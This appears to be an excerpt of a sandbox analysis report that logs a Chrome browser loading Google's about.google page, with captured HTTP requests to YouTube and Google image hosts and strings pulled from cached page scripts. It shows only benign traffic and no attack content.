    Source: global trafficHTTP traffic detected: GET /generate_204?UEopvA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/DVwHCGAr_OE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=17Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?T-_zXA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/F0QXB5pw2qE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=25Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?hp8gSw HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/KIViy7L_lo8?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?b0YUVg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/q7o7R5BgWDY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=15Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /generate_204?wnr66g HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/Lv-sY_z8MNs?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=19Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-icons.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.1.1679378313.0.0.0
    Source: global trafficHTTP traffic detected: GET /ytc/AL5GRJUNolsa3j03QZxx3egj_yEP6gNK4lzbFRCUgdoi6SM=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-google-color-logo.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.1.1679378313.0.0.0
    Source: global trafficHTTP traffic detected: GET /KR_tQgFYSc-6pG6sf0J8cb59cuL0GF_z76spHvHO-HAPqX8Fo_CNhJ3FfBIMJ0MLqmMERINkaPYQLUV-D4y3MtNNQcjaldjUU9KJtcprio0VKAmgeko HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-icon-expand-more.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.1.1679378313.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-google-solid-logo.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.1.1679378313.0.0.0
    Source: global trafficHTTP traffic detected: GET /assets-stories-2021/img/glue-help.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.1.1679378313.0.0.0
    Source: global trafficHTTP traffic detected: GET /QEMbwo7Ti8RLlXgjwI3XmLofgQarTUsJhdlzW3qmjsweqEBVZQybyhODbfGRBJKkpnbEkzZUxCMBcqATjh5XFT6SsxA46apOCAbnRUWmitINMI_VT5w?=w1440=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi_webp/4WXs3sKu41I/maxresdefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ns1RQ15FvvYxdGQzVgZfBQLSVnr2dO10vjsXSMb6ob9Y8YnH_NwT86CExwRLcJ_pgu-yapMF-ijuKF3eZd51wxCF8feR0U8yU7Zpj9P8nuKgU6HLt7k?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /W02GUnHtaJPHRSBIq-gNVwuGPX9s4KcNRuen0qIqjAhxQgTZPoA5l3bs_K-dOeEhDWsLHHzANblqcGHaKRU-58O_0VGUJuRld3LCDpHDb4atFHUnIOz9 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdV5k2CEOt0uTjlBHAvabhD5qdKLXLKLAHXaT59mzVC-6Nz3asgWUkFuqlrTilXv4nvWSo0HMurxuGOILE22pGMRt7Nl36R0D_GZOKL-qlOs0LNyug?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iHqzYEhiw5A9ZGZIu3rGSAQPgXPHm_Hs6Svm6nEgURlbUDdNE-1gOmOW81l6kRMf1pziEJWK41YXQVVxQOZl3OF0Oy-a_nYl7NFKyzpep_RjmcBlh54?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /knzdaC9H3UsDyJYIxRR90Ngh5TdE57GkEDMlgpbT7fO_u8Dmh3l3VmWAzxyxtOBM8x3Lw_lxvIO5Ph27fDNB1L9p-EWaog2Ji6b2lw HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iERG8EH9e9XNAoJGd1L4YhzMT0pLQmWs9wFRF2HU1-AOX7fgqQaVhKPr9SYCgWHFKw6nbLbToncl4pLOYqKuSDuVFsOBD8SebDFlTUGudVnQ_04QG6M HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tD_w389S4CFuR3LEnia0XnPrkuW6fWmQ2PBUrWJdmmAr8VNpsiVssfVzWTcZ6tRdKiThCpGubjas3ibI58FTlcUGnD8m_X7L9jgNeo07i12huWjZkqK1 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wCGOhL6icJWSXcsnHRdh9OYFq7sksI8mbSz9Dy2dWn4QBEt_46Recz7sZTjLZOfZ4oOOwQj0WZEW2GjUKChL3CpGQcAIt0L2PqQVwNdsJeTtNeyf9b0?=w1440 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /TYyhtgs6po_zT3exdwvm3xqA-J_-scIhbNvmNQHFNs87MSWcwWtaoQYJdvcuI8VF967PFWWGsKVcevUYTygdwHcdvxLVprxS5wEf-58iDfNjLH9UiSlF HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DadS_3zeQeDcl8UL1JN5Fde-_q5NFV2n6-0So7Ylpd00U0i3zhPXRGJJv98HlfKif4nPzY73AoYQWeuX55cYuZ0Puc45APIrNEYbdmsYLJhpI0sBXLk HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tXssN0AcrlblKe6BUWhLJqgTDHdLLVy7OYiagJrHQJONSwFZFDHeAd-BCUQ5G449--R80fEJtGX1Ucz6p3ce6U_3FGCfkkKO4Xxi0ihF21fVarvUV4E HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dd86GfBmU80zX_gBKX8vD3jcolry9sjlvguaakt0t7oc8jZtX3XUUyDMyDSvIhEIobxWhNnjm1DsTU5E6q3I_WoKgfOYLhDzTMF8dm59Kpg0gLhxn8M HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1lqAjjXuM384j0EfDi9U8Y1AfDe6nru7uxUwfMH-vyeD2aQLqvhxh8FuWbqfb-zhjhuSyljoATt1NjEGmRCbjbFE6XA1Fdb_oHWJNgGMxwFp_Dha8Eo HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /l7tWDOsi7vv4CzF9xthvpZ14buBNB2c0gFrQXm2_OehYVnKqtdVTGg3mHM--_LCDXEhNHMoz336hier2hdWEx7AyW7lonhg7WSTRmfkonmDBtFXsiLs HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /5ZZkQavSKPzPcj4vg-8DqCs2qofs9BZIzfFtSeY8NlqF4d0bWophZMqW4SSg-MKquK6C5VBTC9dXE1YS5PkUXjlIY9GLFaiLBO3_ywWzKiEqGn_cgQMT HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /stOglKI-L-Qw2zjHiiBtJk-yD5dWHmciNUALJQaoDW3z2hYAuVAIPlkd_vOOf5CmAxq4YKb6K1J-Hpek77sA9Riju8yhwu1TFn3SwcIPJxiQdStnYgg HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chromecache_449.1.drString found in binary or memory: href="https://www.youtube.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link" equals www.youtube.com (Youtube)
    Source: chromecache_449.1.drString found in binary or memory: href="https://www.facebook.com/Google" equals www.facebook.com (Facebook)
    Source: chromecache_449.1.drString found in binary or memory: href="https://www.linkedin.com/company/google" equals www.linkedin.com (Linkedin)
    Source: chromecache_449.1.drString found in binary or memory: href="https://www.youtube.com/user/Google" equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: (b="https://www.youtube.com/api/drm/fps?ek="+Uca(d)):(b=c.initData.subarray(4),b=new Uint16Array(b.buffer,b.byteOffset,b.byteLength/2),b=String.fromCharCode.apply(null,b).replace("skd://","https://")):b=this.u.u;this.baseUrl=b;this.fairplayKeyId=vi(this.baseUrl,"ek")||"";if(b=vi(this.baseUrl,"cpi")||"")this.cryptoPeriodIndex=Number(b);this.Fa=this.videoData.K("html5_use_drm_retry");this.ya=c.De?[g.Hf(c.initData,4)]:c.B;fY(this,{sessioninit:c.cryptoPeriodIndex});this.status="in"}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: (g.Gj(c,"redirector.googlevideo.com"),d=c.toString()):c.j.match("rr?[1-9].*\\.c\\.youtube\\.com$")?(g.Gj(c,"www.youtube.com"),d=c.toString()):d=Lsa(d);c=new g.GD(d);c.set("cmo=pf","1");e&&c.set("cmo=td","a1.googlevideo.com");return c}; equals www.youtube.com (Youtube)
    Source: chromecache_493.1.drString found in binary or memory: 2===n&&(n=3);this.tb=n;this.ph=b?b.hl||"en_US":qx("en_US",a.hl);this.region=b?b.contentRegion||"US":qx("US",a.cr);this.hostLanguage=b?b.hostLanguage||"en":qx("en",a.host_language);this.Jn=!this.eb&&Math.random()<g.fH(this.experiments,"web_player_api_logging_fraction");this.jb=!this.eb;this.enabledEngageTypes=new Set;this.deviceIsAudioOnly=!(null==b||!b.deviceIsAudioOnly);this.zd=px(this.zd,a.ismb);this.Qn?(n=a.vss_host||"s.youtube.com","s.youtube.com"===n&&(n=nI(this.Ja)||"www.youtube.com")):n="video.google.com"; equals www.youtube.com (Youtube)
    Source: chromecache_719.1.drString found in binary or memory: []);if(!g.length)return!0;var h=fx(a,c,e);Q(121);"https://www.facebook.com/tr/"===h["gtm.elementUrl"]&&Q(122);if(U(79)&&"https://www.facebook.com/tr/"===h["gtm.elementUrl"])return!0;if(d&&f){for(var l=fb(b,g.length),n=0;n<g.length;++n)g[n](h,l);return l.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},ix=function(){var a=[],b=function(c){return Ka(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c); equals www.facebook.com (Facebook)
    Source: chromecache_493.1.drString found in binary or memory: a),d=/^pp/.test(this.videoData.clientPlaybackNonce),this.Nd(a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+(0,g.M)(),cR(a,"manifest",function(h){b.I=!0;b.xa("pathprobe",h)},function(h){b.Nd(h.errorCode,h.details)}))}}; equals www.youtube.com (Youtube)
    Source: chromecache_719.1.drString found in binary or memory: b,"vert.pix");break;case "PERCENT":Ay(d.verticalThresholds,b,"vert.pct")}zv("sdl","init",!1)?zv("sdl","pending",!1)||J(function(){return By()}):(xv("sdl","init",!0),xv("sdl","pending",!0),J(function(){By();if(Cy()){var e=Dy();qc(z,"scroll",e);qc(z,"resize",e)}else xv("sdl","init",!1)}));return b}Hy.M="internal.enableAutoEventOnScroll";var cc=fa(["data-gtm-yt-inspected-"]),Iy=["www.youtube.com","www.youtube-nocookie.com"],Jy,Ky=!1; equals www.youtube.com (Youtube)
    Source: chromecache_543.1.drString found in binary or memory: b.open("GET","https://www.googleapis.com/youtube/v3/videos?part=snippet%2C+id&key=AIzaSyD-4tE5aKFZYIS_IrfpCDRsgQZbv5VCJZM&id="+a.o);b.send()} equals www.youtube.com (Youtube)
